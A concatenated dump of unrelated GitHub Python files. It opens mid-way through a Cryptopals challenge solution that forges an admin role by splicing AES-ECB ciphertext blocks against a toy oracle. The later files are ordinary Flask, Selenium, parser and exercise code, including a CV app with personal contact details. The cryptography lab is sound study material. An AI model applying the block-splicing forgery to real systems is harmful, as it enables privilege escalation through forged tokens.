random_ints = []\n for i in range(n):\n random_ints.append(randint(0,255))\n return bytes(random_ints)\n\nRANDOM_KEY = random_bytes(16)\n\ndef random_encode(message):\n message = pad_PKCS_7(message,16)\n return AES_ECB_encrypt(message, RANDOM_KEY)\n\ndef parse_key_val(encoded_string):\n key_val_string = str(unpad_PKCS_7(AES_ECB_decrypt(encoded_string, RANDOM_KEY), 16))[2:-1]\n key_val_list = key_val_string.split(\"&\")\n key_val_obj = {}\n for pair in key_val_list:\n key_val = pair.split(\"=\")\n key_val_obj[key_val[0]] = key_val[1]\n return key_val_obj\n\ndef profile_for(email):\n if (email.find(\"&\") != -1 or email.find(\"=\") != -1):\n return \"Invalid Email\"\n else:\n profile_string = \"email=\" + email + \"&uid=10&role=user\"\n encoded_profile = random_encode(bytes(profile_string, 'ascii'))\n return encoded_profile\n\ntest = profile_for(\"kels@mail.com\")\nprint(test)\nprint(parse_key_val(test))\n\n# need to figure out ciphertext that produces \"&role=admin\" without being able to feed & or = into profile_for\ntest_email_1 = \"kels@mail.com\"\ntest_encode = profile_for(test_email_1)\nemail_code = test_encode[:16]\nuid_role_garbage = test_encode[16:32]\ntest_email_2 = (\"0\" * 10) + \"admin\" + (\"\\x0b\" * 11)\ntest_encode = profile_for(test_email_2)\nadmin_chunk = test_encode[16:32]\nprint(parse_key_val(email_code + uid_role_garbage + admin_chunk))\n","repo_name":"langlk/Cryptopals","sub_path":"Set2/Set2Challenge13.py","file_name":"Set2Challenge13.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11366585487","text":"\nfrom flask import Flask, render_template, request\nimport pandas as pd\nimport json\nimport plotly\nimport plotly.express as px\n\nimport csv, re, operator\n# from textblob import TextBlob\n\napp = Flask(__name__)\n\nperson = {\n 'first_name': '黄',\n # 'first_name': '111',\n 'last_name' : '思雨',\n 'sx':'hsy',\n 'con':'123 My Place Drive',\n 'address' : '湖北师范大学',\n 'job': 'Web developer',\n 'tel': '0678282923',\n 'email': 'sasa07072021@outlook.com',\n # 'description' : 'Suite à une expérience internationale en développement web et dans le domaine des arts, l’impact de l’intelligence artificielle dans nos vies me surprend de jour en jour. \\n Aujourd’hui, je souhaite changer de cap et comprendre les secrets que recèlent nos données. J’aimerais mettre à profit ces découvertes au service des entreprises/associations à dimension sociale.',\n 'description' : '我待人真诚,工作认真负责;积极主动,能吃苦耐劳,勇于承受压力;有很强团队协作精神,具有较强的适应能力;纪律性强; 意志坚强,具有较强的无私奉献精神。对待工作认真负责,善于沟通;活泼开朗、乐观上进、有爱心;上进心强、勤于学习能不断提高自身的能力与综合素质。在未来的工作中,我将以充沛的精力,刻苦钻研的精神来努力工作,稳定地提高自己的工作能力,与公司同步发展',\n # 'social_media' : [\n 'social_media' : [\n {\n 'link': '252809',\n 'icon' : 'fa-facebook-f'\n },\n {\n 'link': 'https://github.com/silver201',\n 'icon' : 'fa-github'\n },\n {\n 'link': 'sasa0707@outlook.com',\n 'icon' : 'fa-linkedin-in'\n }\n ],\n 'img': 'img/123.jpg',\n 'experiences' : [\n {\n 'title' : '记账微信小程序',\n 'company': 'AZULIK',\n 'description' : '此项目是一个记账的微信小程序,通过微信用户登录实现记账、预算、展示消费图表等功能。项目技术:项目使用微信开发者工具进行开发,数据库使用微信开发者工具自带的云数据 库。本人主要运用node.js编写实现数据库连接并展示消费图表功能、以及wxml实现界面的一些设计。',\n 'timeframe' : '2021.03-2021.06'\n },\n {\n 'title' : '简易购物商城',\n 'company': 'Independant',\n 'description' : '网页主要展示了一个小型的购物商城。功能包括登录、注册、商品展示、购物车、个人中心、订单展示等。项目描述:网页采用MVC三层框架,WEB层使用jsp技术,控制转发层使用自定义的Servlet来控制,业务逻辑层使用轻量级的JavaBean,,主要使用html+css进行布局美化, 数据库使用mysql实现对数据的操作。项目成果:完成了页面设计(登录注册、商城展示、下订 单、购物车、订单展示、个人中心)以及页面实现。 ',\n 'timeframe' : '2020.09-2020.12'\n }\n # ,\n # {\n # 'title' : 'Sharepoint Intern',\n # 'company': 'ALTEN',\n # 'description' : 'Help to manage a 600 Sharepoint sites platform (audit, migration to Sharepoint newer versions)',\n # 'timeframe' : 'October 2015 - October 2016'\n # }\n ],\n 'education' : [\n {\n # 'university': 'Paris Diderot',\n # 'degree': 'Projets informatiques et Startégies d\\'entreprise (PISE)',\n # 'description' : 'Gestion de projets IT, Audit, Programmation',\n # 'mention' : 'Bien',\n # 'timeframe' : '2015 - 2016'\n 'university': '湖北师范大学',\n # 'degree': 'Projets informatiques et Startégies d\\'entreprise (PISE)',\n 'degree': '软件工程',\n 'description' : '主修课程:C/C++程序设计、数据结构、数据库原理及开发、Java应用开发与实践、Python程序设计基础、软件过程与管理。',\n # 'mention' : 'Bien',\n 'timeframe' : '2018 - 2022'\n }\n ],\n 'programming_languages' : {\n 'HMTL' : ['fa-html5', '100'], \n 'CSS' : ['fa-css3-alt', '100'], \n 'JS' : ['fa-js-square', '90'],\n 'Python': ['fa-python', '70'],\n 'MySQL' : ['fa-database', '60'],\n 'NodeJS' : ['fa-node-js', '50']\n },\n # 'languages' : {'French' : 'Native', 'English' : 'Professional', 'Spanish' : 'Professional', 'Italian' : 'Limited Working Proficiency'},\n 'languages' : {'French' : 'Native', 'English' : 'Professional', 'Spanish' : 'Professional', 'Italian' : 'Limited Working Proficiency'},\n 'interests' : ['运动', '吃东西', 'Languages']\n}\n\n@app.route('/')\ndef cv(person=person):\n return render_template('index.html', person=person)\n\n\n@app.route('/callback', methods=['POST', 'GET'])\ndef cb():\n\treturn gm(request.args.get('data'))\n\n@app.route('/callback1', methods=['POST', 'GET'])\ndef cb1():\n\treturn am(request.args.get('data'))\n\n@app.route('/callback2', methods=['POST', 'GET'])\ndef cb2():\n\treturn gm10(request.args.get('data'))\n \n@app.route('/callback3', methods=['POST', 'GET'])\ndef cb3():\n\treturn gm11(request.args.get('data'))\n\n@app.route('/chart')\ndef index():\n\treturn render_template('chartsajax.html', graphJSON=gm(),graphJSON1=am(),graphJSON2=gm1(),graphJSON3=gm2(),graphJSON4=gm3(),\n\t\tgraphJSON5=gm4(),graphJSON6=gm5(),graphJSON7=gm6(),graphJSON8=gm7(),\n\t\tgraphJSON9=gm8(),graphJSON10=gm9(),graphJSON11=gm10(),graphJSON12=gm11(),\n\t\tgraphJSON13=gm12(),graphJSON14=gm13(),graphJSON15=gm14(),graphJSON16=gm15(),graphJSON17=gm16())\n\n# def gm(country='United Kingdom'):\ndef gm(sex='Male'):\n\t# df = pd.DataFrame(px.data.gapminder())\n\t# df = pd.DataFrame(px.data.iris())\n\tdf = pd.DataFrame(px.data.tips())\n\t# fig = px.line(df[df['country']==country], x=\"year\", y=\"gdpPercap\")\n\t# fig = px.scatter(df, x=\"sepal_width\", y=\"sepal_length\", color=\"species\")\n\t# fig1 = px.line(df[df['smoker']==smoker], x=\"sex\", y=\"size\")\n\t# fig = px.scatter(df[df['smoker']==smoker], x=\"total_bill\", y=\"sex\")\n\t# a=[]\n\tfig=px.scatter(df[df['sex']==sex], x=\"total_bill\", y=\"tip\", color=\"size\", facet_col=\"sex\",\n color_continuous_scale=px.colors.sequential.Viridis, \n render_mode=\"webgl\")\n\t# fig1=px.line(df, x=\"sex\", y=\"size\")\n\t# a.append(fig)\n\t# a.append(fig1)\n\t# graphJSON=[]\n\t# graphJSON=graphJSON.push(json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder))\n\t# graphJSON=graphJSON.push(json.dumps(fig1, cls=plotly.utils.PlotlyJSONEncoder))\n\t\n\t# graphJSON1 = json.dumps(fig1, cls=plotly.utils.PlotlyJSONEncoder)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\t# a=[]\n\t# a.append(graphJSON)\n\t# a.append(graphJSON1)\n\t# return a\n\treturn graphJSON\n\ndef am(sex='Male'):\n\tdf = pd.DataFrame(px.data.tips())\n\t# fig = px.line(df[df['smoker']==smoker], x=\"sex\", y=\"size\")\n\tfig=px.scatter(df[df['sex']==sex], x=\"total_bill\", y=\"tip\", facet_row=\"time\", facet_col=\"day\",\n color=\"smoker\", trendline=\"ols\",category_orders={\"day\": [\"Thur\", \n \"Fri\", \"Sat\", \"Sun\"], \"time\": [\"Lunch\", \"Dinner\"]})\n\t# fig=px.scatter(df, x=\"total_bill\", y=\"tip\", facet_row=\"time\", facet_col=\"day\", color=\"smoker\", trendline=\"ols\",category_orders={\"day\": [\"Thur\", \n # \"Fri\", \"Sat\", \"Sun\"], \"time\": [\"Lunch\", \"Dinner\"]})\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm1():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.scatter_matrix(df)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm2():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.parallel_categories(df, color=\"size\", color_continuous_scale=px.\n colors.sequential.Inferno)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm3():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =px.scatter_geo(df, locations=\"iso_alpha\", color=\"continent\", hover_name=\"country\", size=\"pop\",\n animation_frame=\"year\", projection=\"natural earth\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm4():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.bar(df, x=\"sex\", y=\"total_bill\", color=\"smoker\", barmode=\"group\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm5():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.bar(df, x=\"sex\", y=\"total_bill\", color=\"smoker\", barmode=\"group\", \n facet_row=\"time\", facet_col=\"day\", category_orders={\"day\": [\"Thur\", \n \"Fri\", \"Sat\", \"Sun\"], \"time\": [\"Lunch\", \"Dinner\"]})\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm6():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.box(df, x=\"day\", y=\"total_bill\", color=\"smoker\", notched=True)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm7():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig =px.violin(df, y=\"tip\", x=\"smoker\", color=\"sex\", box=True, points=\"all\", \n hover_data=df.columns)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm8():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =px.choropleth(df, locations='iso_alpha', color='lifeExp', hover_name='country', animation_frame='year',\n color_continuous_scale=px.colors.sequential.Plasma, projection='natural earth')\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm9():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =px.line_geo(df.query(\"year==2007\"), locations=\"iso_alpha\", \n color=\"continent\", projection=\"orthographic\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm10(country='United Kingdom'):\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =fig = px.line(df[df['country']==country], x=\"year\", y=\"lifeExp\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm11(country='United Kingdom'):\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig = px.line(df[df['country']==country], x=\"year\", y=\"gdpPercap\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm12():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.scatter(df.query(\"year==2007\"), x='gdpPercap', y='lifeExp', color='continent', size='pop', size_max=60)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm13():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.scatter(df.query(\"year==2007\"),x='gdpPercap', y='lifeExp', color='continent', size='pop', size_max=60, hover_name='country', facet_col='continent', log_x=True)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm14():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.scatter(df, x='gdpPercap', y='lifeExp', size='pop', color='continent', hover_name='country', \n animation_frame='year', animation_group='country', log_x=True, range_x=[100,100000], range_y=[25, 90],\n labels=dict(pop='Population', gdpPercap='GDP per Capita', lifeExp='Life Expectancy'))\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm15():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.line(df, x=\"year\", y=\"lifeExp\", color=\"continent\", \n line_group=\"country\", hover_name=\"country\",\n line_shape=\"spline\", render_mode=\"svg\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm16():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.area(df, x=\"year\", y=\"pop\", color=\"continent\", \n line_group=\"country\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\n@app.route('/senti')\ndef main():\n\ttext = \"\"\n\tvalues = {\"positive\": 0, \"negative\": 0, \"neutral\": 0}\n\n\twith open('ask_politics.csv', 'rt') as csvfile:\n\t\treader = csv.DictReader(csvfile, delimiter=',', quotechar='\"')\n\t\tfor idx, row in enumerate(reader):\n\t\t\tif idx > 0 and idx % 2000 == 0:\n\t\t\t\tbreak\n\t\t\tif 'text' in row:\n\t\t\t\tnolinkstext = re.sub(r'''(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))''', '', row['text'], flags=re.MULTILINE)\n\t\t\t\ttext = nolinkstext\n\n\t\t\tblob = TextBlob(text)\n\t\t\tfor sentence in blob.sentences:\n\t\t\t\tsentiment_value = sentence.sentiment.polarity\n\t\t\t\tif sentiment_value >= -0.1 and sentiment_value <= 0.1:\n\t\t\t\t\tvalues['neutral'] += 1\n\t\t\t\telif sentiment_value < 0:\n\t\t\t\t\tvalues['negative'] += 1\n\t\t\t\telif sentiment_value > 0:\n\t\t\t\t\tvalues['positive'] += 1\n\n\tvalues = sorted(values.items(), key=operator.itemgetter(1))\n\ttop_ten = list(reversed(values))\n\tif len(top_ten) >= 11:\n\t\ttop_ten = top_ten[1:11]\n\telse :\n\t\ttop_ten = top_ten[0:len(top_ten)]\n\n\ttop_ten_list_vals = []\n\ttop_ten_list_labels = []\n\tfor language in top_ten:\n\t\ttop_ten_list_vals.append(language[1])\n\t\ttop_ten_list_labels.append(language[0])\n\n\tgraph_values = [{\n\t\t\t\t\t'labels': top_ten_list_labels,\n\t\t\t\t\t'values': top_ten_list_vals,\n\t\t\t\t\t'type': 'pie',\n\t\t\t\t\t'insidetextfont': {'color': '#FFFFFF',\n\t\t\t\t\t\t\t\t\t\t'size': '14',\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t'textfont': {'color': '#FFFFFF',\n\t\t\t\t\t\t\t\t\t\t'size': '14',\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t}]\n\n\tlayout = {'title': '<b>意见挖掘</b>'}\n\n\treturn render_template('index.html', graph_values=graph_values, layout=layout)\n\n\nif __name__ == '__main__':\n app.run(debug= True,port=5000,threaded=True)\n","repo_name":"silver201/Myproject","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":13481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42013768852","text":"import nodes_parser as npa\r\nimport token_lexer as tl\r\nimport translator as tra\r\n###############################################################################\r\n# token_lexer - Contain functions for tokenization and lexer.\r\n# nodes_parser - Used for the creation of nodes and interpretation of tokens.\r\n# translator - Combine tokenization and translation of python file.\r\n###############################################################################\r\nimport argparse\r\n\r\ndef get_args():\r\n \r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument(\"-p\", \"--path_to_python\", help=\"Path to python file\", type=str, required=True)\r\n parser.add_argument(\"-c\", \"--path_to_cpp\", help=\"Path to C++ file\", type=str, required=False)\r\n parser.add_argument(\"-no_save\", \"--save\", help=\"By default, the result is saved\", action='store_false')\r\n parser.add_argument(\"-no_display\", \"--display\", help=\"By default, the result is presented\", action='store_false')\r\n \r\n args = parser.parse_args()\r\n \r\n return args.path_to_python, args.path_to_cpp, args.save, args.display\r\n\r\n\r\ndef main():\r\n path_to_python, path_to_cpp, save, display = get_args()\r\n \r\n test_fib = tra.translator(path_to_python,path_to_cpp)\r\n test_fib.tokenize()\r\n test_fib.translate()\r\n \r\n if(save == True and path_to_cpp != None):\r\n test_fib.save_cpp()\r\n elif(save == False and path_to_cpp != None):\r\n print('No path to C++ file')\r\n if(display == True):\r\n print(\"------------------------\")\r\n print(\"Tokens\")\r\n print(\"------------------------\\n\") \r\n print(test_fib.tokens)\r\n print(\"------------------------\")\r\n print(\"Python code\")\r\n print(\"------------------------\")\r\n print(test_fib.python_code)\r\n print(\"\\n------------------------\")\r\n print(\"C++ code\")\r\n print(\"------------------------\")\r\n print(test_fib.cpp_code)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"KonradOrzelowski/Python2Cpp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22858835615","text":"from http import HTTPStatus\n\nfrom app.data.protocols.log_error_repository import LogErrorRepository\nfrom app.presentation.protocols import Controller, HttpRequest, HttpResponse\n\n\nclass LogControllerDecorator(Controller):\n def __init__(\n self, controller: Controller, log_error_repository: LogErrorRepository\n ):\n self._controller = controller\n self._log_error_repository = log_error_repository\n\n def handle(self, http_request: HttpRequest) -> HttpResponse:\n http_response = self._controller.handle(http_request)\n if http_response.status == HTTPStatus.INTERNAL_SERVER_ERROR:\n self._log_error_repository.log_error(http_response.body.stack)\n return http_response\n","repo_name":"rafaph/clean-python-api","sub_path":"app/main/decorators/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71053850385","text":"#!/usr/bin/env python3.6\n# -*- Coding: UTF-8 -*-\n\"\"\"\nThe validate functions of meta-language.\nGiven a logml file, return the sintatic structure.\nBy: E. S. Pereira\nVersion: 0.0.1\nDate: 31/08/2017\n\"\"\"\n\nfrom .exceptions import NoKeyExpressionFounded, InvalidKeyExpressionFounded\nfrom .exceptions import InconsistenNumberOfArgsIFacts, EmptyFact\nfrom .exceptions import NoClosedKeyExpression\n\n\ndef validate_meta(frase, predicate):\n \"\"\"\n Validate main text in meta-language\n \"\"\"\n if \"#\" not in frase:\n raise NoKeyExpressionFounded(\n \"No # simbol found in {}\".format(predicate))\n if frase.count(\"#\") > 2:\n raise InvalidKeyExpressionFounded(\n \"More than 2 # simbol found in {}\".format(predicate))\n if frase.count(\"#\") == 1:\n raise NoClosedKeyExpression(\n \"No closed # simbol found in {}\".format(predicate))\n\ndef validate_meta_star(frase, predicate, args):\n \"\"\"\n Validade change simbol in meta-language\n \"\"\"\n if isinstance(args, list):\n tmp = list(set([len(ai[\"dynamic\"]) for ai in args if \"dynamic\" in ai]))\n args = tmp + list(set([len(ai[\"1\"]) for ai in args if \"1\" in ai]))\n else:\n args = list(set([len(args[\"1\"])]))\n\n if len(args) > 1:\n raise InconsistenNumberOfArgsIFacts(\n \"Number of args inconsisten in {}\".format(predicate)\n )\n\n if not args:\n raise EmptyFact(\n \"No args found in {}\".format(predicate)\n )\n\n\n if \"*\" not in frase:\n raise NoKeyExpressionFounded(\n \"No * simbol found in {}\".format(predicate))\n if frase.count(\"*\") > args[0]:\n raise InvalidKeyExpressionFounded(\n \"More * than constants in {}\".format(predicate))\n if frase.count(\"*\") < args[0]:\n raise InvalidKeyExpressionFounded(\n \"Less * than constants in {}\".format(predicate))\n","repo_name":"duducosmos/logml","sub_path":"validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73259588946","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.select import Select\nimport time\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.maximize_window()\ndriver.implicitly_wait(5)\ndriver.get('https://www.facebook.com/')\n\n\ndef selectDropDownUsing(selectElement, SelectByValue):\n select = Select(selectElement)\n select.select_by_value(SelectByValue)\n\n\ndef deSelectDropDownUsing(selectElement, SelectByValue):\n select = Select(selectElement)\n select.deselect_by_value(SelectByValue)\n\n\ndef isMultiple(selectElement):\n select = Select(selectElement)\n return select.is_multiple\n\n\ndef printAllTheListItems(selectElement):\n select = Select(selectElement)\n listOfItems = select.options\n for items in listOfItems:\n print(items.text)\n\n\ndef selectItemFrom(selectElement, valueToBeSelected):\n select = Select(selectElement)\n listOfItems = select.options\n for items in listOfItems:\n if items.text == valueToBeSelected:\n items.click()\n break\n\n\n# select without using select\ndef selectWithoutSelect(xpathExpression, valueToBeSelected):\n listOfItems = driver.find_elements(By.XPATH, xpathExpression)\n for items in listOfItems:\n if items.text == valueToBeSelected:\n items.click()\n break\n\n\nday_DropDown = driver.find_element(By.ID, 'day')\nmonth_DropDown = driver.find_element(By.ID, 'month')\nyear_DropDown = driver.find_element(By.ID, 'year')\n\n# selecting\nselectDropDownUsing(day_DropDown, '4')\nselectDropDownUsing(month_DropDown, '7')\nselectDropDownUsing(year_DropDown, '1991')\n\nprint(isMultiple(day_DropDown))\nprint(isMultiple(month_DropDown))\nprint(isMultiple(year_DropDown))\n\n# Deselecting\ntry:\n deSelectDropDownUsing(day_DropDown, '4')\n deSelectDropDownUsing(month_DropDown, '7')\n deSelectDropDownUsing(year_DropDown, '1991')\nexcept Exception as e:\n print(e, ' found')\n\nprintAllTheListItems(month_DropDown)\n\nselectItemFrom(month_DropDown, 'Jun')\n\nselectWithoutSelect(\".//*[@id='month']/option\", 'Dec')\n\ntime.sleep(5)\ndriver.quit()\n","repo_name":"dashmation/PyMation","sub_path":"LearnSelenium/HandlingDropDownUsingDef.py","file_name":"HandlingDropDownUsingDef.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28839275961","text":"from sys import stdin\n\n\nclass PuyoPyuo(object):\n\n def __init__(self, arr):\n self.arr = arr\n self.visited = None\n\n def _find_same_color(self, x, y, c, k):\n if x < 0 or x >= 12:\n return 0\n if y < 0 or y >= 6:\n return 0\n if self.arr[x][y] != c:\n return 0\n if self.visited[x][y] != 0:\n return 0\n\n assert self.visited is not None \n self.visited[x][y] = k\n count = self._find_same_color(x+1, y, c, k) +\\\n self._find_same_color(x, y+1, c, k) +\\\n self._find_same_color(x-1, y, c, k) +\\\n self._find_same_color(x, y-1, c, k)\n return count + 1\n\n def boom_checker(self):\n self.visited = [[False]*6 for _ in range(12)]\n boom_list = []\n k = 0\n cnt = 0\n for i in range(12):\n for j in range(6):\n if self.arr[i][j] != '.':\n k += 1\n cnt = self._find_same_color(\n i, j, self.arr[i][j], k)\n if cnt >= 4:\n boom_list.append(k)\n return boom_list\n\n def boom(self, boom_list):\n assert self.visited is not None \n for i in range(12):\n for j in range(6):\n if self.visited[i][j] in boom_list:\n self.arr[i][j] = '.'\n \n for i in range(6):\n for j in range(11, -1, -1):\n if self.arr[j][i] != '.':\n continue\n for k in range(j-1, -1, -1):\n if self.arr[k][i] != '.':\n self.arr[j][i] = self.arr[k][i]\n self.arr[k][i] = '.'\n break\n\n def get_boom_count(self):\n count = 0\n while True:\n boom_list = self.boom_checker()\n if len(boom_list) == 0:\n break\n self.boom(boom_list)\n # self._print()\n count += 1\n return count\n\n\nif __name__ == '__main__':\n rd = stdin.readline\n arr = [list(rd().strip()) for _ in range(12)]\n pp = PuyoPyuo(arr)\n print(pp.get_boom_count())\n","repo_name":"wonjaek36/algorithm_test","sub_path":"baekjoon/11559/11559.py","file_name":"11559.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31432984727","text":"import re\nfrom collections import Counter\n\nfrom Github.Github_Api import retrieve_readme\n\n\n\n\ndef words(text): return re.findall(r'\\w+', text.lower())\n\nWORDS = Counter(words(open('Comments.xml',encoding='UTF8').read()))\nincorrect_word_list = []\n\ndef P(word, N=sum(WORDS.values())):\n \"Probability of `word`.\"\n print(N)\n return WORDS[word] / N\nprint(P('a'))\n\n\ndef correction(word):\n \"Most probable spelling correction for word.\"\n\n most_probable_word = max(candidates(word), key=P)\n #print(P(word))\n if most_probable_word != word:\n if most_probable_word != 'a':\n incorrect_word_list.append(word)\n print(('incorrect word: '+word+', Most probable word in the dictionary: '+most_probable_word))\n return False\n else:\n print('correct word')\n\n else:\n print(('correct word: '+word))\n return True\n\n\n\n\ndef candidates(word):\n \"Generate possible spelling corrections for word.\"\n return (known([word]) or known(edits1(word)) or known(edits2(word)) or [word])\n\n\ndef known(words):\n \"The subset of `words` that appear in the dictionary of WORDS.\"\n return set(w for w in words if w in WORDS)\n\n\ndef edits1(word):\n \"All edits that are one edit away from `word`.\"\n letters = 'abcdefghijklmnopqrstuvwxyz'\n splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]\n deletes = [L + R[1:] for L, R in splits if R]\n transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R) > 1]\n replaces = [L + c + R[1:] for L, R in splits if R for c in letters]\n inserts = [L + c + R for L, R in splits for c in letters]\n return set(deletes + transposes + replaces + inserts)\n\n\ndef edits2(word):\n \"All edits that are two edits away from `word`.\"\n return (e2 for e1 in edits1(word) for e2 in edits1(e1))\n\n\n\n\n# print correction('pylint')","repo_name":"ruchiraPeiris/Starc-Recruiter","sub_path":"Github/comm_skill/spell_checker.py","file_name":"spell_checker.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19644820990","text":"# Fazer uma função chamada ‘conta_string(v)’ que conte quantos elementos strings existem em uma lista.\n# Fazer uma função chamada ‘conta_boolean(v)’ que conte quantos elementos lógicos existem em uma lista.\n# Fazer uma função chamada ‘conta_float(v)’ que conte quantos elementos float existem em uma lista.\n# Fazer um procedimento chamado ‘copia_int(lista1, lista2)’ que copie para a lista 2 os elementos inteiros da lista 1\n\nvet = [\"Pedro\", 21, True, \"Mine\", False, \"17\", 12, \"19\", 2, \"1.2\", \"3.45\", 12.2, \"True\", \"pedrodaniluz.com.12.12.1\"]\nvet2 = [\"PythonAmizade\"]\n\n\ndef conta_string(v):\n som = 0\n for x in v:\n if type(x) == str:\n if x != \"True\" and x != \"False\":\n splited = x.split(\".\")\n tem_escrito = False\n for a in splited:\n if not a.isnumeric():\n tem_escrito = True\n if tem_escrito:\n som += 1\n return som\n\n\ndef conta_string2(v):\n som = 0\n for x in v:\n if isinstance(x, str):\n if x != \"True\" and x != \"False\":\n splited = x.split(\".\")\n if any(not a.isnumeric() for a in splited):\n som += 1\n return som\n\n\ndef conta_boolean(v):\n som = 0\n for x in v:\n if type(x) == bool:\n som += 1\n elif type(x) == str:\n if x == \"True\" or x == \"False\":\n som += 1\n return som\n\n\ndef conta_float(v):\n som = 0\n for x in v:\n if type(x) == float:\n som += 1\n elif type(x) == str:\n splited = x.split(\".\")\n if len(splited) == 2:\n if splited[0].isnumeric() and splited[1].isnumeric():\n som += 1\n return som\n\n\ndef copia_int(v1, v2):\n for x in v1:\n if type(x) == int:\n v2.append(x)\n elif type(x) == str:\n if x.isnumeric():\n v2.append(int(x))\n return v2\n\n\nprint(conta_string2(vet))\nprint(conta_boolean(vet))\nprint(conta_float(vet))\nprint(copia_int(vet, vet2))\n","repo_name":"PedroDaniluz/python_learning","sub_path":"aulas/aula10/ex_final_vetores2.py","file_name":"ex_final_vetores2.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72240105426","text":"#Exercise 45\r\n\r\nfrom collections import Counter\r\n\r\nall_characters = \"qwertyuiopasdfghjklzxcvbnm\"\r\ninp = input(\"Enter a string: \").lower()\r\n\r\ninp_char = [i for i in inp]\r\n\r\ncount = Counter(inp_char)\r\n\r\nif len(count) == 26:\r\n print(\"Yes\")\r\nelse:\r\n lst = [key[0] for key in count.items() if key[1]!=0]\r\n ans = [i for i in all_characters if i not in lst]\r\n print(' '.join(ans))\r\n\r\n\r\n\r\n","repo_name":"baselhusam/The-Practice-of-Computing-Using-Python-Solved","sub_path":"Chapter 4/Problem 